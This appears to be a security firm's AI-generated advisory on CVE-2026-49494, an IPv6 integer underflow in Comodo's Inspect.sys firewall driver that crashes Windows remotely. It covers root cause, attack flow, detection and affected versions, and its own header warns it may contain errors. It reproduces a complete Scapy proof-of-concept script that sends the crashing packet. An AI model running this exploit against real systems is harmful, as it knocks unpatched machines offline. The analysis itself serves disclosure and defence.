ZeroPath at Black Hat USA 2026

Comodo Internet Security CVE-2026-49494: Remote Kernel BSOD via IPv6 Integer Underflow with Public PoC

A brief summary of CVE-2026-49494, an integer underflow in Comodo Internet Security's kernel firewall driver that allows a single crafted IPv6 packet to crash Windows systems remotely. Includes PoC details, detection guidance, and mitigation strategies for an unpatched zero day.

CVE Analysis

12 min read

ZeroPath CVE Analysis
ZeroPath CVE Analysis

2026-06-07

Comodo Internet Security CVE-2026-49494: Remote Kernel BSOD via IPv6 Integer Underflow with Public PoC
Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.

[email protected]

Introduction

A single malformed IPv6 packet can remotely crash any Windows machine running Comodo Internet Security, and the firewall itself is the vulnerable component, meaning blocking all ports offers zero protection. Discovered by Marcus Hutchins (MalwareTech) and disclosed on June 7, 2026, CVE-2026-49494 is an unpatched zero day in Comodo's kernel mode firewall driver Inspect.sys that triggers a Blue Screen of Death through an integer underflow in the IPv6 extension header parser.

Comodo Internet Security is an endpoint protection suite encompassing firewall, antivirus, and intrusion prevention capabilities, with over 85 million reported installations worldwide. The company also held the leading position in the global SSL/TLS certificate market with approximately 37.1% market share. Given this scale, the vulnerability has a substantial potential blast radius across consumer and small business environments where Comodo is deployed as the primary host firewall.

Technical Information

Root Cause: CWE-191 Integer Underflow

The vulnerability is classified under CWE-191 (Integer Underflow / Wrap or Wraparound), defined as a weakness where "the product subtracts one value from another, such that the result is less than the minimum allowable integer value, causing the value to wrap around to the maximum allowable value."

The vulnerable code resides in the IPv6 packet parser within Inspect.sys, Comodo Internet Security's kernel mode firewall driver. During IPv6 header chain traversal, the parser reads the Payload Length field from the IPv6 fixed header and stores it in packet_desc->payload_length as an unsigned 64-bit integer. As it iterates through each IPv6 extension header, it performs the operation:

packet_desc->payload_length -= ext_hdr_len

at assembly address 0x1400ee21 without validating that payload_length remains non-negative after each subtraction.

When a crafted packet declares a Payload Length smaller than the cumulative size of its extension headers, the unsigned subtraction wraps around. For example, if the declared payload length is 8 and the extension header is 16 bytes, the result is 8 - 16 = 0xFFFFFFFFFFFFFFF8 (approximately 18.4 quintillion), a near-maximal 64-bit unsigned integer.

Two Crash Paths

The underflowed value propagates through two distinct code paths, each leading to a system crash:

Path 1: Out of Bounds Read (No Open Port Required)

After the underflow, the corrupted payload length is truncated to 16 bits and passed to ScanForHTTPArtifacts, a function that scans for WebDAV related data. This function attempts to read past the end of its allocated memory buffer into unallocated memory. Because Inspect.sys runs at DISPATCH_LEVEL IRQL, a page fault from this invalid memory access cannot be handled by the Windows memory manager and triggers an immediate system crash. This is the primary attack vector and requires no open ports on the target.

Path 2: Oversized memcpy (Requires Open TCP Port)

On a separate branch, the corrupted size is truncated to a 32-bit value, causing a memcpy operation that attempts to copy up to approximately 4 GB of data. This path requires a full TCP three-way handshake, meaning the target must have at least one open TCP port. Even if the scanner function crash were somehow avoided, this memcpy is guaranteed to crash the system.

Code PathFunctionSize TruncationImpactRequires Open Port
Out of bounds readScanForHTTPArtifacts16-bitInvalid memory read at DISPATCH_LEVEL, BSODNo
Oversized memcpyKernel copy routine32-bit (~4 GB)Guaranteed kernel pool overflow, BSODYes (TCP handshake)

Why Firewall Rules Cannot Protect Against This

The critical design flaw is architectural: the IPv6 parsing routine executes before firewall rule enforcement. As Hutchins notes, "it doesn't matter whether the target port is open or closed, unless the system has a firewall for its firewall." The very component designed to filter malicious traffic is the one that contains the vulnerability, and it processes packets at a stage where no filtering decisions have yet been made.

Attack Flow

  1. The attacker crafts a single IPv6 packet with a Payload Length field set to 8, while including a Destination Options extension header that is actually 16 bytes long.
  2. The Destination Options header type (type 60) is chosen because it is designated for the final destination host and is the least likely to be validated or dropped by transit routers.
  3. The attacker sends the packet to the target system's IPv6 address. No authentication, user interaction, or special privileges are required.
  4. The Comodo firewall driver receives the packet and begins parsing the IPv6 header chain before evaluating any firewall rules.
  5. The unsigned 64-bit payload length underflows from 8 to 0xFFFFFFFFFFFFFFF8.
  6. The corrupted value causes an out of bounds read in the Windows kernel at DISPATCH_LEVEL, producing an immediate BSOD.

RCE Assessment

Hutchins assessed the vulnerability as denial of service only, stating he is "almost certain it's unexploitable" for remote code execution. The 4 GB kernel pool overflow requirement on the memcpy path and the constraints of the out of bounds write make reliable code execution highly unlikely. The primary risk is system crash and availability impact.

Proof of Concept

A public, fully functional proof of concept exists in the MalwareTech/ComoDoS GitHub repository, published by Marcus Hutchins on June 3, 2026. The exploit is a Python 3 script using Scapy to craft and send the malformed IPv6 packet:

#!/usr/bin/env python3 from scapy.all import * from scapy.layers.inet import TCP from scapy.layers.inet6 import PadN, IPv6ExtHdrDestOpt, IPv6 def build_poc(dst_ip): pad = PadN(optdata=b"\x00" * 8) ext = IPv6ExtHdrDestOpt(nh=6, options=[pad]) tcp = TCP(sport=1337, dport=80, flags="S", seq=0, ack=1, window=0x2000) ipv6 = IPv6(dst=dst_ip, nh=60, hlim=64, plen=8) pkt = ipv6 / ext / tcp return pkt DST_IP = "::dead:beef" exploit_pkt = build_poc(DST_IP) for i in range(0, 6000): send(exploit_pkt, verbose=False)

The key exploit primitive: the IPv6 Next Header field is set to 60 (Destination Options), and the Payload Length (plen) is set to 8. The attached Destination Options extension header is 16 bytes total (8 byte mandatory header plus 8 byte PadN option data). When the driver computes 8 - 16, the unsigned subtraction underflows. The packet is sent 6,000 times to ensure the crash is triggered reliably, though a single packet is sufficient in principle.

A demonstration video showing a remote BSOD of a target system is also available. The accompanying detailed technical write-up was published on the MalwareTech blog. This was disclosed as an unpatched zero day after failed coordinated disclosure attempts with Comodo.

If the sender lacks native IPv6 connectivity, the exploit can still be tested by enabling the "Filter IPv6 traffic" option in the Comodo firewall and sending the malicious frame directly to the target NIC's MAC address.

Detection Methods

As of June 7, 2026, CVE-2026-49494 does not have formal detection rules in Sigma, Snort/Suricata, or YARA. Tenable's CVE page explicitly states "No plugins found for this CVE." However, the detailed technical write-up and PoC provide a strong foundation for building custom detection.

Network Level Detection

The exploit packet has a very specific and anomalous structure that network monitoring solutions can flag. Defenders should configure intrusion detection systems (Zeek/Bro, Suricata, or custom packet inspection) to alert on IPv6 packets where the Payload Length field in the fixed header is less than the cumulative size of the extension headers that follow it. Any such packet is inherently malformed.

Specific indicators from the published PoC:

  • IPv6 Next Header field set to 60 (Destination Options extension header)
  • IPv6 Payload Length (plen) set to 8, while the Destination Options header is actually 16 bytes long (8 byte mandatory header plus 8 bytes of PadN option data)
  • A TCP segment (Next Header = 6) following the extension header, typically with characteristics like sport=1337, dport=80, and SYN flag set, though the specific TCP parameters are not essential to the exploit logic

The core detection logic is straightforward: any IPv6 packet where the declared payload length is smaller than the extension header chain it contains is inherently invalid and a strong indicator of exploitation attempts against this class of vulnerability.

Host Level Detection

Because the exploit triggers a kernel crash, the most visible host indicator is a Windows BSOD. Defenders should monitor:

  • BugCheck events (Event ID 1001) from the Windows Error Reporting source, logged after an unexpected system restart caused by a BSOD. If these occur on systems running Comodo Internet Security, especially when correlated with inbound IPv6 network traffic, they are a strong indicator of exploitation.
  • Inspect.sys in crash dump analysis: Kernel minidumps or full memory dumps generated by the BSOD will reference the faulting driver. Post-mortem analysis should look for Inspect.sys in the call stack, which would confirm the Comodo firewall driver as the crash source.

Asset Level Detection

The primary asset level approach is to inventory systems running Comodo Internet Security version 12.3.4.8162 or earlier with the Inspect.sys firewall driver loaded. Any such system is vulnerable. Defenders should check whether IPv6 is enabled on the network interface of affected hosts, as disabling IPv6 on the NIC or at the network level would prevent exploitation over the network (though local exploitation is still possible by sending directly to the NIC's MAC address with the "Filter IPv6 traffic" option enabled in Comodo).

Affected Systems and Versions

Based on the VulnCheck advisory, the following versions are affected:

  • Comodo Internet Security version 12.3.4.8162 and all prior versions
  • The vulnerable component is the kernel mode firewall driver Inspect.sys
  • Any Windows system with Comodo Internet Security installed and the firewall driver active is vulnerable
  • Systems with IPv6 enabled on any network interface are exploitable remotely
  • Systems with IPv6 disabled but the "Filter IPv6 traffic" option enabled in Comodo settings are exploitable via direct MAC address targeting on the local network segment
  • Firewall configuration (including blocking all ports) provides no protection, as the vulnerable parser executes before rule enforcement

No patched version has been identified as of June 7, 2026.

Vendor Security History

Comodo's security track record includes several notable incidents that provide context for this vulnerability:

2011: Certificate Authority Partner Breach. A Registration Authority partner of Comodo suffered an internal security breach. The attacker fraudulently obtained SSL certificates for major sites including google.com, mail.google.com, and login.live.com. Browser vendors including Mozilla, Google, and Microsoft responded by revoking the compromised certificates. This incident was particularly significant because it compromised the trust model of the SSL/TLS ecosystem.

2019: Forum Data Breach. A Comodo database was hacked, exposing account login information for up to 245,000 forum users, including usernames, real names, email addresses, and hashed passwords.

2024: Local Privilege Escalation (CVE-2024-7248). A local privilege escalation vulnerability in Comodo Internet Security Pro allowed local attackers to escalate privileges on affected installations.

2026: Remote Kernel DoS (CVE-2026-49494). The current vulnerability, an integer underflow in Inspect.sys enabling remote, unauthenticated system crash.

The pattern of kernel mode driver vulnerabilities (CVE-2024-7248 for local privilege escalation and now CVE-2026-49494 for remote DoS) raises questions about code review practices for Inspect.sys and other low-level components. The fact that the IPv6 parser lacks basic bounds validation on an arithmetic operation suggests insufficient fuzzing or formal verification of packet processing code paths.

It is also worth noting that the vulnerability was discovered through an AI-assisted BYOVD (Bring Your Own Vulnerable Driver) research pipeline, where AI flagged an older version of Inspect.sys and manual analysis by Hutchins confirmed the same bug existed in the current driver version. This discovery method may signal a broader trend in vulnerability research that could surface additional issues in similar kernel drivers.

References

Detect & fix
what others miss

Works with
  • GitHub
  • GitLab
  • Bitbucket
  • Azure DevOps Services
  • Jira
  • Linear
  • Slack
  • Security Compass
Security magnifying glass visualization